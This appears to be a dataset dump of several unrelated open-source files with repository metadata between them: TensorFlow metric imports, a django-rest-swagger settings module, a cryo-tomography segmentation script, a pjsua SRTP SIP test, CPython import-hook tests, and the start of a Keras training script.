Finally, finalization is performed by evaluating the "value_tensor"
In practice, we commonly want to evaluate across many batches and multiple
metrics. To do so, we need only run the metric computation operations multiple
times:
```python
labels = ...
predictions = ...
accuracy, update_op_acc = tf.contrib.metrics.streaming_accuracy(
labels, predictions)
error, update_op_error = tf.contrib.metrics.streaming_mean_absolute_error(
labels, predictions)
sess.run(tf.initialize_local_variables())
for batch in range(num_batches):
sess.run([update_op_acc, update_op_error])
accuracy, mean_absolute_error = sess.run([accuracy, mean_absolute_error])
```
Note that when evaluating the same metric multiple times on different inputs,
one must specify the scope of each metric to avoid accumulating the results
together:
```python
labels = ...
predictions0 = ...
predictions1 = ...
accuracy0 = tf.contrib.metrics.accuracy(labels, predictions0, name='preds0')
accuracy1 = tf.contrib.metrics.accuracy(labels, predictions1, name='preds1')
```
Certain metrics, such as streaming_mean or streaming_accuracy, can be weighted
via a `weights` argument. The `weights` tensor must be the same size as the
labels and predictions tensors and results in a weighted average of the metric.
Other metrics, such as streaming_recall, streaming_precision, and streaming_auc,
are not well defined with regard to weighted samples. However, a binary
`ignore_mask` argument can be used to ignore certain values at graph executation
time.
## Metric `Ops`
@@streaming_accuracy
@@streaming_mean
@@streaming_recall
@@streaming_precision
@@streaming_auc
@@streaming_recall_at_k
@@streaming_mean_absolute_error
@@streaming_mean_iou
@@streaming_mean_relative_error
@@streaming_mean_squared_error
@@streaming_root_mean_squared_error
@@streaming_mean_cosine_distance
@@streaming_percentage_less
@@streaming_sensitivity_at_specificity
@@streaming_sparse_precision_at_k
@@streaming_sparse_recall_at_k
@@streaming_specificity_at_sensitivity
@@auc_using_histogram
@@accuracy
@@confusion_matrix
@@aggregate_metrics
@@aggregate_metric_map
## Set `Ops`
@@set_difference
@@set_intersection
@@set_size
@@set_union
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,g-importing-member,wildcard-import
from tensorflow.contrib.metrics.python.metrics import *
from tensorflow.contrib.metrics.python.ops.confusion_matrix_ops import confusion_matrix
from tensorflow.contrib.metrics.python.ops.histogram_ops import auc_using_histogram
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metric_map
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metrics
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_accuracy
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_auc
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_absolute_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_cosine_distance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_iou
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_relative_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_tensor
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_percentage_less
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_root_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sensitivity_at_specificity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_specificity_at_sensitivity
from tensorflow.contrib.metrics.python.ops.set_ops import set_difference
from tensorflow.contrib.metrics.python.ops.set_ops import set_intersection
from tensorflow.contrib.metrics.python.ops.set_ops import set_size
from tensorflow.contrib.metrics.python.ops.set_ops import set_union
from tensorflow.python.util.all_util import make_all
__all__ = make_all(__name__)
| 42.694915
| 97
| 0.818711
|
4a0f28823cd0b8bb48beedcb19d78be6a6416aff
| 746
|
py
|
Python
|
rest_framework_swagger/__init__.py
|
kaitlin/django-rest-swagger
|
06a067cbb7d863ce1d9f6341ed4e96a14840f288
|
[
"BSD-2-Clause"
] | null | null | null |
rest_framework_swagger/__init__.py
|
kaitlin/django-rest-swagger
|
06a067cbb7d863ce1d9f6341ed4e96a14840f288
|
[
"BSD-2-Clause"
] | null | null | null |
rest_framework_swagger/__init__.py
|
kaitlin/django-rest-swagger
|
06a067cbb7d863ce1d9f6341ed4e96a14840f288
|
[
"BSD-2-Clause"
] | 1
|
2021-02-18T11:05:55.000Z
|
2021-02-18T11:05:55.000Z
|
VERSION = '0.2.8'
DEFAULT_SWAGGER_SETTINGS = {
'exclude_namespaces': [],
'api_version': '',
'api_path': '/',
'api_key': '',
'token_type': 'Token',
'enabled_methods': ['get', 'post', 'put', 'patch', 'delete'],
'is_authenticated': False,
'is_superuser': False,
'permission_denied_handler': None,
'template_path': 'rest_framework_swagger/index.html',
'doc_expansion': 'none',
}
try:
from django.conf import settings
SWAGGER_SETTINGS = getattr(settings, 'SWAGGER_SETTINGS', DEFAULT_SWAGGER_SETTINGS)
for key, value in DEFAULT_SWAGGER_SETTINGS.items():
if key not in SWAGGER_SETTINGS:
SWAGGER_SETTINGS[key] = value
except:
SWAGGER_SETTINGS = DEFAULT_SWAGGER_SETTINGS
| 27.62963
| 86
| 0.66622
|
4a0f28b3220c37092148bea29a82c2f8e8bda5ce
| 14,378
|
py
|
Python
|
code/tutorials/exp_domb/pre_tomos_seg.py
|
anmartinezs/pyseg_system
|
5bb07c7901062452a34b73f376057cabc15a13c3
|
[
"Apache-2.0"
] | 12
|
2020-01-08T01:33:02.000Z
|
2022-03-16T00:25:34.000Z
|
code/tutorials/exp_domb/pre_tomos_seg.py
|
anmartinezs/pyseg_system
|
5bb07c7901062452a34b73f376057cabc15a13c3
|
[
"Apache-2.0"
] | 8
|
2019-12-19T19:34:56.000Z
|
2022-03-10T10:11:28.000Z
|
code/tutorials/exp_domb/pre_tomos_seg.py
|
anmartinezs/pyseg_system
|
5bb07c7901062452a34b73f376057cabc15a13c3
|
[
"Apache-2.0"
] | 2
|
2022-03-30T13:12:22.000Z
|
2022-03-30T18:12:10.000Z
|
"""
Pre-processing for mb_graph_batch.py of double oriented membranes from a lumen labeled segmentation
Input: - STAR file with 3 columns:
+ _rlnMicrographName: tomogram original (denisity map)
+ _psSegImage: labelled tomogram with the segmentations
+ _mtMtubesCsv: (optional) a .csv file with microtubule center lines
- Setting for segmenting the pairs of membranes:
- Sub-volume splitting settings
Output: - A STAR file with 3 columns:
+ _rlnMicrographName: tomogram original
+ _rlnImageName: sub-volumes
+ _psSegImage: Oriented double membrane segmentations for each subvolume
+ Columns for localizing the sub-volumes within each original tomogram
"""
################# Package import
import gc
import os
import sys
import math
import time
import pyseg as ps
import scipy as sp
import skimage as sk
import numpy as np
from pyseg.globals import signed_distance_2d
###### Global variables
__author__ = 'Antonio Martinez-Sanchez'
MB_LBL_1, MB_LBL_2 = 1, 2
EXT_LBL_1, EXT_LBL_2 = 3, 4
GAP_LBL, BG_LBL = 5, 0
########################################################################################
# PARAMETERS
########################################################################################
ROOT_PATH = '/fs/pool/pool-ruben/antonio/nuc_mito'
# Input STAR file
in_star = ROOT_PATH + '/pre/in/dmb_seg_oriented.star'
# Output directory
out_dir = ROOT_PATH + '/pre/mbdo_nosplit'
# Subvolume splitting settings
sp_split = None # (2, 2, 1)
sp_off_voxels = 30 # vox
# Membrane segmentation
sg_lbl_mb1 = 1
sg_lbl_mb2 = 2
sg_lbl_ext1 = 3
sg_lbl_ext2 = 4
sg_lbl_gap = 5
sg_lbl_bg = 6
sg_res = 1.408 # nm/voxel
sg_mb_thick = 5 # nm
sg_mb_neigh = 20 # nm
sg_mb_gap = 40 # nm
sg_min_vx_seg = 10 # vx
# CSV file pre-processing
cv_coords_cools = (1, 2, 3)
cv_id_col = 4
# Microtubule settings
mt_rad = 30 # nm
mt_swap_xy = False
########################################################################################
# MAIN ROUTINE
########################################################################################
########## Print initial message
print('Pre-processing for SEG analysis of un-oriented membranes from TomoSegMemTV output.')
print('\tAuthor: ' + __author__)
print('\tDate: ' + time.strftime("%c") + '\n')
print('Options:')
print('\tOutput directory: ' + str(out_dir))
print('\tInput STAR file: ' + str(in_star))
print('\tData resolution: ' + str(sg_res) + ' nm/vx')
print('\tMembrane segmentation:')
print('\t\t-Segmentation labels:')
print('\t\t\t+Membrane 1: ' + str(sg_lbl_mb1))
print('\t\t\t+Membrane 2: ' + str(sg_lbl_mb2))
print('\t\t\t+External 1: ' + str(sg_lbl_ext1))
print('\t\t\t+External 2: ' + str(sg_lbl_ext2))
print('\t\t\t+Gap: ' + str(sg_lbl_gap))
print('\t\t-Segmentation resolution: ' + str(sg_res) + ' nm/vx')
print('\t\t-Membrane thickness: ' + str(sg_mb_thick) + ' nm')
print('\t\t-External neighbourhood maximum distance: ' + str(sg_mb_neigh) + ' nm')
print('\t\t-Gap maximum distance: ' + str(sg_mb_gap) + ' nm')
print('\t\t-Minum number of voxels per segmentation: ' + str(sg_min_vx_seg))
print('\tSub-volume splitting settings: ')
print('\t\t-Number of splits (X, Y, Z): ' + str(sp_split))
print('\t\t-Offset voxels: ' + str(sp_off_voxels))
print('\tMicrotubule settings:')
print('\t\t-Microtube luminal radius: ' + str(mt_rad) + ' nm')
print('\tCSV pre-processing: ')
print('\t\t-Columns for samples coordinates (X, Y, Z): ' + str(cv_coords_cools))
print('\t\t-Column for microtubule ID: ' + str(cv_id_col))
print('')
######### Process
print('Parsing input parameters...')
sp_res, mt_rad, sp_off_voxels = float(sg_res), float(mt_rad), int(sp_off_voxels)
out_stem = os.path.splitext(os.path.split(in_star)[1])[0]
conn_mask = np.ones(shape=(3,3,3))
out_seg_dir = out_dir + '/segs'
if not os.path.isdir(out_seg_dir):
os.makedirs(out_seg_dir)
print('Loading input STAR file...')
gl_star = ps.sub.Star()
try:
gl_star.load(in_star)
except ps.pexceptions.PySegInputError as e:
print('ERROR: input STAR file could not be loaded because of "' + e.get_message() + '"')
print('Terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
star = ps.sub.Star()
star.add_column(key='_rlnMicrographName')
star.add_column(key='_rlnImageName')
star.add_column(key='_psSegImage')
star.add_column(key='_psSegRot')
star.add_column(key='_psSegTilt')
star.add_column(key='_psSegPsi')
star.add_column(key='_psSegOffX')
star.add_column(key='_psSegOffY')
star.add_column(key='_psSegOffZ')
print('Main Routine: tomograms loop')
tomo_id = 0
for row in range(gl_star.get_nrows()):
in_ref = gl_star.get_element('_rlnMicrographName', row)
print('\tProcessing tomogram: ' + in_ref)
out_ref_stem = os.path.splitext(os.path.split(in_ref)[1])[0]
in_seg = gl_star.get_element('_psSegImage', row)
print('\t\t-Loading segmentation: ' + in_seg)
orig_seg = ps.disperse_io.load_tomo(gl_star.get_element('_psSegImage', row))
tomo_ref = ps.disperse_io.load_tomo(in_ref, mmap=True)
off_mask_min_x, off_mask_max_x = 0, tomo_ref.shape[0]
off_mask_min_y, off_mask_max_y = 0, tomo_ref.shape[1]
off_mask_min_z, off_mask_max_z = 0, tomo_ref.shape[2]
wide_x = off_mask_max_x - off_mask_min_x
wide_y = off_mask_max_y - off_mask_min_y
wide_z = off_mask_max_z - off_mask_min_z
if gl_star.has_column('_mtMtubesCsv'):
in_csv = gl_star.get_element('_mtMtubesCsv', row)
print('\tReading input CSV file: ' + in_csv)
mt_dic = ps.globals.read_csv_mts(in_csv, cv_coords_cools, cv_id_col, swap_xy=mt_swap_xy)
mts_points = list()
for mt_id, mt_samps in zip(iter(mt_dic.keys()), iter(mt_dic.values())):
mts_points += mt_samps
mts_points = np.asarray(mts_points, dtype=np.float32) * (1./sg_res)
print('\tSegmenting the microtubules...')
mt_mask = ps.globals.points_to_mask(mts_points, orig_seg.shape, inv=True)
mt_mask = sp.ndimage.morphology.distance_transform_edt(mt_mask, sampling=sg_res, return_indices=False)
mt_mask = mt_mask > mt_rad
print('\t\t-Membranes pair segmentation...')
sg_mb_thick_2 = 0.5 * sg_mb_thick
tomo_seg = np.zeros(shape=orig_seg.shape, dtype=np.int8)
mb1_dst = sp.ndimage.morphology.distance_transform_edt(orig_seg != sg_lbl_mb1, sampling=sg_res, return_indices=False)
mb2_dst = sp.ndimage.morphology.distance_transform_edt(orig_seg != sg_lbl_mb2, sampling=sg_res, return_indices=False)
tomo_seg[(mb1_dst <= sg_mb_thick_2 + sg_mb_neigh) & (orig_seg == sg_lbl_ext1)] = EXT_LBL_1
tomo_seg[(mb2_dst <= sg_mb_thick_2 + sg_mb_neigh) & (orig_seg == sg_lbl_ext2)] = EXT_LBL_2
tomo_seg[(mb1_dst <= sg_mb_thick_2 + sg_mb_gap) & (mb2_dst <= sg_mb_thick_2 + sg_mb_gap) & (orig_seg == sg_lbl_gap)] = GAP_LBL
tomo_seg[mb1_dst <= sg_mb_thick_2] = MB_LBL_1
tomo_seg[mb2_dst <= sg_mb_thick_2] = MB_LBL_2
tomo_seg[orig_seg == sg_lbl_bg] = BG_LBL
gap_dst = sp.ndimage.morphology.distance_transform_edt(tomo_seg != GAP_LBL, sampling=sg_res, return_indices=False)
tomo_seg[gap_dst > sg_mb_thick_2 + sg_mb_neigh] = BG_LBL
if gl_star.has_column('_mtMtubesCsv'):
tomo_seg[np.invert(mt_mask)] = BG_LBL
# Computer segmentation bounds
hold_mask = tomo_seg != BG_LBL
ids_mask = np.where(hold_mask)
off_mask_min_x, off_mask_max_x = ids_mask[0].min()-sp_off_voxels, ids_mask[0].max()+sp_off_voxels
if off_mask_min_x < 0:
off_mask_min_x = 0
if off_mask_max_x > hold_mask.shape[0]:
off_mask_max_x = hold_mask.shape[0]
off_mask_min_y, off_mask_max_y = ids_mask[1].min()-sp_off_voxels, ids_mask[1].max()+sp_off_voxels
if off_mask_min_y < 0:
off_mask_min_y = 0
if off_mask_max_y > hold_mask.shape[1]:
off_mask_max_y = hold_mask.shape[1]
off_mask_min_z, off_mask_max_z = ids_mask[2].min()-sp_off_voxels, ids_mask[2].max()+sp_off_voxels
if off_mask_min_z < 0:
off_mask_min_z = 0
if off_mask_max_z > hold_mask.shape[2]:
off_mask_max_z = hold_mask.shape[2]
del hold_mask
del ids_mask
print('\tSegmenting the membranes...')
if sp_split is None:
svol_seg = tomo_seg[off_mask_min_x:off_mask_max_x, off_mask_min_y:off_mask_max_y, off_mask_min_z:off_mask_max_z]
if ((svol_seg == MB_LBL_1).sum() >= sg_min_vx_seg) and ((svol_seg == MB_LBL_2).sum() > sg_min_vx_seg) \
and ((svol_seg == EXT_LBL_1).sum() >= sg_min_vx_seg) and ((svol_seg == EXT_LBL_2).sum() > sg_min_vx_seg) and \
((svol_seg == GAP_LBL).sum() >= sg_min_vx_seg):
svol = tomo_ref[off_mask_min_x:off_mask_max_x, off_mask_min_y:off_mask_max_y, off_mask_min_z:off_mask_max_z]
out_svol = out_seg_dir + '/' + out_ref_stem + '_tid_' + str(tomo_id) + '.mrc'
out_seg = out_seg_dir + '/' + out_ref_stem + '_tid_' + str(tomo_id) + '_seg.mrc'
ps.disperse_io.save_numpy(svol, out_svol)
ps.disperse_io.save_numpy(svol_seg, out_seg)
del svol_seg
row_dic = dict()
row_dic['_rlnMicrographName'] = in_ref
row_dic['_rlnImageName'] = out_svol
row_dic['_psSegImage'] = out_seg
row_dic['_psSegRot'] = 0
row_dic['_psSegTilt'] = 0
row_dic['_psSegPsi'] = 0
row_dic['_psSegOffX'] = off_mask_min_x # 0
row_dic['_psSegOffY'] = off_mask_min_y # 0
row_dic['_psSegOffZ'] = off_mask_min_z
star.add_row(**row_dic)
else:
print('\tSplitting into subvolumes:')
if sp_split[0] > 1:
hold_wide = int(math.ceil(wide_x / sp_split[0]))
hold_pad = int(math.ceil((off_mask_max_x - off_mask_min_x) / sp_split[0]))
hold_split = int(sp_split[0] * math.ceil(float(hold_pad)/hold_wide))
offs_x = list()
pad_x = off_mask_min_x + int(math.ceil((off_mask_max_x-off_mask_min_x) / hold_split))
offs_x.append((off_mask_min_x, pad_x+sp_off_voxels))
lock = False
while not lock:
hold = offs_x[-1][1] + pad_x
if hold >= off_mask_max_x:
offs_x.append((offs_x[-1][1] - sp_off_voxels, off_mask_max_x))
lock = True
else:
offs_x.append((offs_x[-1][1]-sp_off_voxels, offs_x[-1][1]+pad_x+sp_off_voxels))
else:
offs_x = [(off_mask_min_x, off_mask_max_x),]
if sp_split[1] > 1:
hold_wide = int(math.ceil(wide_y / sp_split[1]))
hold_pad = int(math.ceil((off_mask_max_y - off_mask_min_y) / sp_split[1]))
hold_split = int(sp_split[1] * math.ceil(float(hold_pad) / hold_wide))
offs_y = list()
pad_y = off_mask_min_y + int(math.ceil((off_mask_max_y-off_mask_min_y) / hold_split))
offs_y.append((off_mask_min_x, pad_y + sp_off_voxels))
lock = False
while not lock:
hold = offs_y[-1][1] + pad_y
if hold >= off_mask_max_y:
offs_y.append((offs_y[-1][1] - sp_off_voxels, off_mask_max_y))
lock = True
else:
offs_y.append((offs_y[-1][1] - sp_off_voxels, offs_y[-1][1] + pad_y + sp_off_voxels))
else:
offs_y = [(off_mask_min_x, off_mask_max_x),]
if sp_split[2] > 1:
hold_wide = int(math.ceil(wide_z / sp_split[2]))
hold_pad = int(math.ceil((off_mask_max_z - off_mask_min_z) / sp_split[2]))
hold_split = int(sp_split[2] * math.ceil(float(hold_pad) / hold_wide))
offs_z = list()
pad_z = off_mask_min_z + int(math.ceil((off_mask_max_z-off_mask_min_z) / hold_split))
offs_z.append((off_mask_min_z, pad_z + sp_off_voxels))
lock = False
while not lock:
hold = offs_z[-1][1] + pad_z
if hold >= off_mask_max_z:
offs_z.append((offs_z[-1][1] - sp_off_voxels, off_mask_max_z))
lock = True
else:
offs_z.append((offs_z[-1][1] - sp_off_voxels, offs_z[-1][1] + pad_z + sp_off_voxels))
else:
offs_z = [(off_mask_min_z, off_mask_max_z),]
split_id = 1
for off_x in offs_x:
for off_y in offs_y:
for off_z in offs_z:
print('\t\t-Splitting subvolume: [' + str(off_x) + ', ' + str(off_y) + ', ' + str(off_z) + ']')
svol_seg = tomo_seg[off_x[0]:off_x[1], off_y[0]:off_y[1], off_z[0]:off_z[1]]
if ((svol_seg == MB_LBL_1).sum() >= sg_min_vx_seg) and ((svol_seg == MB_LBL_2).sum() > sg_min_vx_seg) \
and ((svol_seg == EXT_LBL_1).sum() >= sg_min_vx_seg) and ((svol_seg == EXT_LBL_2).sum() > sg_min_vx_seg) and \
((svol_seg == GAP_LBL).sum() >= sg_min_vx_seg):
svol = tomo_ref[off_x[0]:off_x[1], off_y[0]:off_y[1], off_z[0]:off_z[1]]
out_svol = out_seg_dir + '/' + out_ref_stem + '_id_' + str(tomo_id) + '_split_' + str(split_id) + '.mrc'
out_seg = out_seg_dir + '/' + out_ref_stem + '_id_' + str(tomo_id) + '_split_' + str(split_id) + '_mb.mrc'
ps.disperse_io.save_numpy(svol, out_svol)
ps.disperse_io.save_numpy(svol_seg, out_seg)
split_id += 1
row_dic = dict()
row_dic['_rlnMicrographName'] = in_ref
row_dic['_rlnImageName'] = out_svol
row_dic['_psSegImage'] = out_seg
row_dic['_psSegRot'] = 0
row_dic['_psSegTilt'] = 0
row_dic['_psSegPsi'] = 0
row_dic['_psSegOffX'] = off_x[0]
row_dic['_psSegOffY'] = off_y[0]
row_dic['_psSegOffZ'] = off_z[0]
star.add_row(**row_dic)
# Prepare next iteration
gc.collect()
tomo_id += 1
out_star = out_dir + '/' + out_stem + '_pre.star'
print('\tStoring output STAR file in: ' + out_star)
star.store(out_star)
print('Terminated. (' + time.strftime("%c") + ')')
| 44.513932
| 138
| 0.612463
|
4a0f2945c4bb35e2e6109d3cfe3a4df686c62ca0
| 805
|
py
|
Python
|
pjproject_android/tests/pjsua/scripts-sendto/312_srtp1_recv_savp.py
|
WachterJud/qaul.net_legacy
|
9c2be0a38ad6e90fadc0d1150340e37d220997ae
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 4
|
2016-09-29T00:04:31.000Z
|
2021-12-02T08:39:51.000Z
|
pjproject_android/tests/pjsua/scripts-sendto/312_srtp1_recv_savp.py
|
WachterJud/qaul.net_legacy
|
9c2be0a38ad6e90fadc0d1150340e37d220997ae
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 1
|
2020-02-20T06:58:16.000Z
|
2020-02-20T07:08:07.000Z
|
my_softphone/pjproject-2.9/tests/pjsua/scripts-sendto/312_srtp1_recv_savp.py
|
sashkaseltsov1/reposCpp
|
3ff5ce2a14a368a36b1758099ce4f3e8c4cdf11d
|
[
"Unlicense"
] | 5
|
2019-07-02T02:03:24.000Z
|
2022-03-30T09:58:52.000Z
|
# $Id: 312_srtp1_recv_savp.py 2036 2008-06-20 17:43:55Z nanang $
import inc_sip as sip
import inc_sdp as sdp
sdp = \
"""
v=0
o=- 0 0 IN IP4 127.0.0.1
s=tester
c=IN IP4 127.0.0.1
t=0 0
m=audio 4000 RTP/SAVP 0 101
a=rtpmap:0 PCMU/8000
a=sendrecv
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-15
a=crypto:1 AES_CM_128_HMAC_SHA1_80 inline:WnD7c1ksDGs+dIefCEo8omPg4uO8DYIinNGL5yxQ
a=crypto:2 AES_CM_128_HMAC_SHA1_32 inline:t0r0/apkukU7JjjfR0mY8GEimBq4OiPEm9eKSFOx
"""
args = "--null-audio --auto-answer 200 --max-calls 1 --use-srtp 1 --srtp-secure 0"
include = ["m=audio \d+ RTP/SAVP", "a=crypto"]
exclude = []
sendto_cfg = sip.SendtoCfg( "Callee has SRTP optional receive RTP/SAVP, should answer RTP/SAVP too",
pjsua_args=args, sdp=sdp, resp_code=200,
resp_inc=include, resp_exc=exclude)
| 27.758621
| 101
| 0.735404
|
4a0f29e7b4d4b0d87220729cdf6e8cbb7e41aa32
| 8,589
|
py
|
Python
|
webStorm-APICloud/python_tools/Lib/test/test_importhooks.py
|
zzr925028429/androidyianyan
|
8967fdba92473e8e65ee222515dfc54cdae5bb0b
|
[
"MIT"
] | null | null | null |
webStorm-APICloud/python_tools/Lib/test/test_importhooks.py
|
zzr925028429/androidyianyan
|
8967fdba92473e8e65ee222515dfc54cdae5bb0b
|
[
"MIT"
] | null | null | null |
webStorm-APICloud/python_tools/Lib/test/test_importhooks.py
|
zzr925028429/androidyianyan
|
8967fdba92473e8e65ee222515dfc54cdae5bb0b
|
[
"MIT"
] | null | null | null |
import sys
import imp
import os
import unittest
from test import test_support
test_src = """\
def get_name():
return __name__
def get_file():
return __file__
"""
absimp = "import sub\n"
relimp = "from . import sub\n"
deeprelimp = "from .... import sub\n"
futimp = "from __future__ import absolute_import\n"
reload_src = test_src+"""\
reloaded = True
"""
test_co = compile(test_src, "<???>", "exec")
reload_co = compile(reload_src, "<???>", "exec")
test2_oldabs_co = compile(absimp + test_src, "<???>", "exec")
test2_newabs_co = compile(futimp + absimp + test_src, "<???>", "exec")
test2_newrel_co = compile(relimp + test_src, "<???>", "exec")
test2_deeprel_co = compile(deeprelimp + test_src, "<???>", "exec")
test2_futrel_co = compile(futimp + relimp + test_src, "<???>", "exec")
test_path = "!!!_test_!!!"
class TestImporter:
modules = {
"hooktestmodule": (False, test_co),
"hooktestpackage": (True, test_co),
"hooktestpackage.sub": (True, test_co),
"hooktestpackage.sub.subber": (True, test_co),
"hooktestpackage.oldabs": (False, test2_oldabs_co),
"hooktestpackage.newabs": (False, test2_newabs_co),
"hooktestpackage.newrel": (False, test2_newrel_co),
"hooktestpackage.sub.subber.subest": (True, test2_deeprel_co),
"hooktestpackage.futrel": (False, test2_futrel_co),
"sub": (False, test_co),
"reloadmodule": (False, test_co),
}
def __init__(self, path=test_path):
if path != test_path:
# if out class is on sys.path_hooks, we must raise
# ImportError for any path item that we can't handle.
raise ImportError
self.path = path
def _get__path__(self):
raise NotImplementedError
def find_module(self, fullname, path=None):
if fullname in self.modules:
return self
else:
return None
def load_module(self, fullname):
ispkg, code = self.modules[fullname]
mod = sys.modules.setdefault(fullname,imp.new_module(fullname))
mod.__file__ = "<%s>" % self.__class__.__name__
mod.__loader__ = self
if ispkg:
mod.__path__ = self._get__path__()
exec code in mod.__dict__
return mod
class MetaImporter(TestImporter):
def _get__path__(self):
return []
class PathImporter(TestImporter):
def _get__path__(self):
return [self.path]
class ImportBlocker:
"""Place an ImportBlocker instance on sys.meta_path and you
can be sure the modules you specified can't be imported, even
if it's a builtin."""
def __init__(self, *namestoblock):
self.namestoblock = dict.fromkeys(namestoblock)
def find_module(self, fullname, path=None):
if fullname in self.namestoblock:
return self
return None
def load_module(self, fullname):
raise ImportError, "I dare you"
class ImpWrapper:
def __init__(self, path=None):
if path is not None and not os.path.isdir(path):
raise ImportError
self.path = path
def find_module(self, fullname, path=None):
subname = fullname.split(".")[-1]
if subname != fullname and self.path is None:
return None
if self.path is None:
path = None
else:
path = [self.path]
try:
file, filename, stuff = imp.find_module(subname, path)
except ImportError:
return None
return ImpLoader(file, filename, stuff)
class ImpLoader:
def __init__(self, file, filename, stuff):
self.file = file
self.filename = filename
self.stuff = stuff
def load_module(self, fullname):
mod = imp.load_module(fullname, self.file, self.filename, self.stuff)
if self.file:
self.file.close()
mod.__loader__ = self # for introspection
return mod
class ImportHooksBaseTestCase(unittest.TestCase):
def setUp(self):
self.path = sys.path[:]
self.meta_path = sys.meta_path[:]
self.path_hooks = sys.path_hooks[:]
sys.path_importer_cache.clear()
self.modules_before = sys.modules.copy()
def tearDown(self):
sys.path[:] = self.path
sys.meta_path[:] = self.meta_path
sys.path_hooks[:] = self.path_hooks
sys.path_importer_cache.clear()
sys.modules.clear()
sys.modules.update(self.modules_before)
class ImportHooksTestCase(ImportHooksBaseTestCase):
def doTestImports(self, importer=None):
import hooktestmodule
import hooktestpackage
import hooktestpackage.sub
import hooktestpackage.sub.subber
self.assertEqual(hooktestmodule.get_name(),
"hooktestmodule")
self.assertEqual(hooktestpackage.get_name(),
"hooktestpackage")
self.assertEqual(hooktestpackage.sub.get_name(),
"hooktestpackage.sub")
self.assertEqual(hooktestpackage.sub.subber.get_name(),
"hooktestpackage.sub.subber")
if importer:
self.assertEqual(hooktestmodule.__loader__, importer)
self.assertEqual(hooktestpackage.__loader__, importer)
self.assertEqual(hooktestpackage.sub.__loader__, importer)
self.assertEqual(hooktestpackage.sub.subber.__loader__, importer)
TestImporter.modules['reloadmodule'] = (False, test_co)
import reloadmodule
self.failIf(hasattr(reloadmodule,'reloaded'))
TestImporter.modules['reloadmodule'] = (False, reload_co)
reload(reloadmodule)
self.failUnless(hasattr(reloadmodule,'reloaded'))
import hooktestpackage.oldabs
self.assertEqual(hooktestpackage.oldabs.get_name(),
"hooktestpackage.oldabs")
self.assertEqual(hooktestpackage.oldabs.sub,
hooktestpackage.sub)
import hooktestpackage.newrel
self.assertEqual(hooktestpackage.newrel.get_name(),
"hooktestpackage.newrel")
self.assertEqual(hooktestpackage.newrel.sub,
hooktestpackage.sub)
import hooktestpackage.sub.subber.subest as subest
self.assertEqual(subest.get_name(),
"hooktestpackage.sub.subber.subest")
self.assertEqual(subest.sub,
hooktestpackage.sub)
import hooktestpackage.futrel
self.assertEqual(hooktestpackage.futrel.get_name(),
"hooktestpackage.futrel")
self.assertEqual(hooktestpackage.futrel.sub,
hooktestpackage.sub)
import sub
self.assertEqual(sub.get_name(), "sub")
import hooktestpackage.newabs
self.assertEqual(hooktestpackage.newabs.get_name(),
"hooktestpackage.newabs")
self.assertEqual(hooktestpackage.newabs.sub, sub)
def testMetaPath(self):
i = MetaImporter()
sys.meta_path.append(i)
self.doTestImports(i)
def testPathHook(self):
sys.path_hooks.append(PathImporter)
sys.path.append(test_path)
self.doTestImports()
def testBlocker(self):
mname = "exceptions" # an arbitrary harmless builtin module
if mname in sys.modules:
del sys.modules[mname]
sys.meta_path.append(ImportBlocker(mname))
try:
__import__(mname)
except ImportError:
pass
else:
self.fail("'%s' was not supposed to be importable" % mname)
def testImpWrapper(self):
i = ImpWrapper()
sys.meta_path.append(i)
sys.path_hooks.append(ImpWrapper)
mnames = ("colorsys", "urlparse", "distutils.core", "compiler.misc")
for mname in mnames:
parent = mname.split(".")[0]
for n in sys.modules.keys():
if n.startswith(parent):
del sys.modules[n]
for mname in mnames:
m = __import__(mname, globals(), locals(), ["__dummy__"])
m.__loader__ # to make sure we actually handled the import
def test_main():
test_support.run_unittest(ImportHooksTestCase)
if __name__ == "__main__":
test_main()
| 33.034615
| 78
| 0.600768
|
4a0f2a23eb163e4a363a24e969c5cd41f35ae2b0
| 3,488
|
py
|
Python
|
Training.py
|
naveenmg143/Leaf-Disease-Detection
|
1ec248e74ef56e80edaf6831e09ef41d5d8cfdd5
|
[
"Apache-2.0"
] | null | null | null |
Training.py
|
naveenmg143/Leaf-Disease-Detection
|
1ec248e74ef56e80edaf6831e09ef41d5d8cfdd5
|
[
"Apache-2.0"
] | null | null | null |
Training.py
|
naveenmg143/Leaf-Disease-Detection
|
1ec248e74ef56e80edaf6831e09ef41d5d8cfdd5
|
[
"Apache-2.0"
] | null | null | null |
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import InteractiveSession
config = ConfigProto()
config.gpu_options.allow_growth = True
session = InteractiveSession(config=config)
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import MaxPooling2D
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import Dense
from tensorflow.keras.preprocessing.image import ImageDataGenerator
import tensorflow as tf
tf.compat.v1.disable_eager_execution()
